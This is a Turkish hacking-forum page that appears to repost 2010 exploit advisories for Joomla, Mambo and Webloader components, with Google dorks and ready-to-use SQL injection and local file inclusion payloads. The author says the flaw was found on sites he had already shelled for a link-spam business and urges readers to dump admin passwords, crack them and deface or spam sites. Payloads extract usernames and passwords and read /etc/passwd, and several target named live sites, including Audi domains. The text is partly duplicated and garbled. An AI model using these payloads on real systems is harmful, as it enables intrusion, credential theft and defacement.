Joomla Component RSfiles <= (cid) SQL injection Vulnerability
Bildiginiz gibi şu sayfamdaki hizmetim hacklink satışı için listeme taze kan lazım oldugu için elimdeki daha önceden shell soktugum sitelerin eklentilerini incelerken farkettigim bir güvenlik açıgıdır, bu güvenlik açıgı, joomla RSfiles eklentisini kullanan sitelerde veritabanına erişmemize ve sitenin tablolarından kolonlarda var olan her türlü bilgiyi okuyabilmemizi saglamaktadır..
arama kodu : com_rsfiles
arama sonuçlarında sitenin sonuna eklenecek kod:
Bu kodla sadece db adı ve db versiyonunu ögrenebilirsiniz. geri kalan için kendinizle baş başasınız, herşeyi devletten beklemeyin araştırın biraz yapabilirseniz çekin admin bilgilerini şifrelerini kırın sonrada admin paneline girip istediginizi yapın ister siteyi hackleyin istersenizde hacklink ekleyin okyy .
Joomla Component com_lead SQL Injection
[TR] Title: Joomla Component com_lead SQL Injection
[TR] Date: 03.06.2010
[TR] Author: ByEge
[TR] Homepage: byege.blogspot.com
[TR] Vendor: ×�ער×ת ×*×××× ×ק×××ת | Leadya
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
[TR] ExploiT :
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
column number : 14
column name : username , password
table name : jos_users
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
Webloader v8 SQL Injection Vulnerability
[~] Title: Webloader v8 SQL Injection Vulnerability
[~] Date: 24.05.2010
[~] Script Home: www.webloader.org
[~] Author: ByEge
[~] Homepage: byege.blogspot.com
[~] vidgoster.php Bug code :
[~] Example :
[~] tamerotik.com'
Webloader Adult Script ( vid ) SQL Injection Vulnerability
Url : http://www.tunuskirtasiye.com.tr/pub/Webloader.txt
Url : Webloader 7 - 8 (vid) SQL Injection Vulnerability
Açıgı Barındıran bir kaç site
Joomla Component com_job LFI Vulnerability
[!] Title: Joomla Component com_job LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
index.php?option=com_job&controller=[LFI]
[!] Example :
Joomla Component com_crowdsource SQL Injection
[!] Title: Joomla Component com_crowdsource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
[!] Example :
Joomla Component com_resource SQL Injection
[!] Title: Joomla Component com_resource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]##########################################[+]
[!] Google Dork : inurl:com_resource
[!] ExploiT :
[!] Example :
Joomla Component com_comp ( cid ) SQL Injection
[!] Title: Joomla Component com_comp ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
[!] Example :
Joomla Component com_doqment ( cid ) SQL Injection
[!] Title: Joomla Component com_doqment ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
[!] Example :
Joomla Component com_product ( catid ) SQL Injection
[!] Title: Joomla Component com_product ( catid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
[!] Example :
[+]########################################################################################################################################################[+]
Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Title: Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
[!] Example :
[+]########################################################################################################################################################[+
Joomla Component com_product LFI Vulnerability
[!] Title: Joomla Component com_product LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
index.php?option=com_product&controller=[LFI]
[!] Example :
http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd
Joomla Component com_product LFI Vulnerability
[!] Title: Joomla Component com_product LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
[!] Example :
Audi - Fiat - Nod32 v.s SQL İnjection
Mambo com_acstartseite SQL injection..
Google dork : index.php?option=com_acstartseite
Bildiginiz gibi şu sayfamdaki hizmetim hacklink satışı için listeme taze kan lazım oldugu için elimdeki daha önceden shell soktugum sitelerin eklentilerini incelerken farkettigim bir güvenlik açıgıdır, bu güvenlik açıgı, joomla RSfiles eklentisini kullanan sitelerde veritabanına erişmemize ve sitenin tablolarından kolonlarda var olan her türlü bilgiyi okuyabilmemizi saglamaktadır..
arama kodu : com_rsfiles
arama sonuçlarında sitenin sonuna eklenecek kod:
Kod:
index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
Bu kodla sadece db adı ve db versiyonunu ögrenebilirsiniz. geri kalan için kendinizle baş başasınız, herşeyi devletten beklemeyin araştırın biraz yapabilirseniz çekin admin bilgilerini şifrelerini kırın sonrada admin paneline girip istediginizi yapın ister siteyi hackleyin istersenizde hacklink ekleyin okyy .
Joomla Component com_lead SQL Injection
[TR] Title: Joomla Component com_lead SQL Injection
[TR] Date: 03.06.2010
[TR] Author: ByEge
[TR] Homepage: byege.blogspot.com
[TR] Vendor: ×�ער×ת ×*×××× ×ק×××ת | Leadya
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
[TR] ExploiT :
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
column number : 14
column name : username , password
table name : jos_users
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
Webloader v8 SQL Injection Vulnerability
[~] Title: Webloader v8 SQL Injection Vulnerability
[~] Date: 24.05.2010
[~] Script Home: www.webloader.org
[~] Author: ByEge
[~] Homepage: byege.blogspot.com
[~] vidgoster.php Bug code :
Kod:
[~]
Kod:
[COLOR=SandyBrown][B]
[~] [~] include 'baglan.php';
[~] $vid=temiz($_GET['vid']);
[/B][/COLOR] [COLOR=SandyBrown][B]
[~] $c=solcek("select * from webvideo where id=$vid");
[~] $va=solarray($c);
[/B][/COLOR] [COLOR=SandyBrown][B]
[~] ?>[/B][/COLOR]
[~] Example :
[~] tamerotik.com'
Webloader Adult Script ( vid ) SQL Injection Vulnerability
Url : http://www.tunuskirtasiye.com.tr/pub/Webloader.txt
Url : Webloader 7 - 8 (vid) SQL Injection Vulnerability
Açıgı Barındıran bir kaç site
Kod:
http://www.seksizlesene.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.fk5.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.eftelya.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://sikisoteli.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.8pornoizle.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.koxp.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.seksizle18.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
http://www.laqr.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
Kod:
[COLOR=SandyBrown][B]http://taviz.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre [/B][/COLOR]
[!] Title: Joomla Component com_job LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
index.php?option=com_job&controller=[LFI]
[!] Example :
Kod:
http://localhost.free/index.php?option=com_job&controller=../../../../../../etc/passwd
Joomla Component com_crowdsource SQL Injection
[!] Title: Joomla Component com_crowdsource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
Kod:
-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
[!] Example :
Kod:
http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
Joomla Component com_resource SQL Injection
[!] Title: Joomla Component com_resource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]##########################################[+]
[!] Google Dork : inurl:com_resource
[!] ExploiT :
Kod:
-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
Kod:
http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
Joomla Component com_comp ( cid ) SQL Injection
[!] Title: Joomla Component com_comp ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
Kod:
-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--
[!] Example :
Kod:
http://localhost.free/index.php?option=com_comp&task=view&cid=-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--
Joomla Component com_doqment ( cid ) SQL Injection
[!] Title: Joomla Component com_doqment ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
Kod:
-3/**/uNIOn/**/sELeCt/**/1,2,3,4,5,6,7,8/**/--
[!] Example :
Kod:
http://localhost.free/index.php?option=com_doqment&cid=-15/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8/**/--
Joomla Component com_product ( catid ) SQL Injection
[!] Title: Joomla Component com_product ( catid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
Kod:
-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--
Kod:
http://localhost.free/index.php?option=com_product&catid=-24/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--
[+]########################################################################################################################################################[+]
Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Title: Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
Kod:
0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[!] Example :
Kod:
http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[+]########################################################################################################################################################[+
Joomla Component com_product LFI Vulnerability
[!] Title: Joomla Component com_product LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
index.php?option=com_product&controller=[LFI]
[!] Example :
http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd
Joomla Component com_product LFI Vulnerability
[!] Title: Joomla Component com_product LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[!] ExploiT :
Kod:
index.php?option=com_product&controller=[LFI]
Kod:
http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd
Kod:
http://www.audi.rs//news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Kod:
http://www.audi.si/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Kod:
http://www.audi.ua/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Kod:
http://www.audi.ro/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Kod:
http://ro.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Kod:
http://w3.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
Google dork : index.php?option=com_acstartseite
Kod:
[COLOR=SandyBrown][B]http://localhost/index.php?option=com_acstartseite&Itemid=-110 UNION SELECT 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mos_users-- [/B][/COLOR]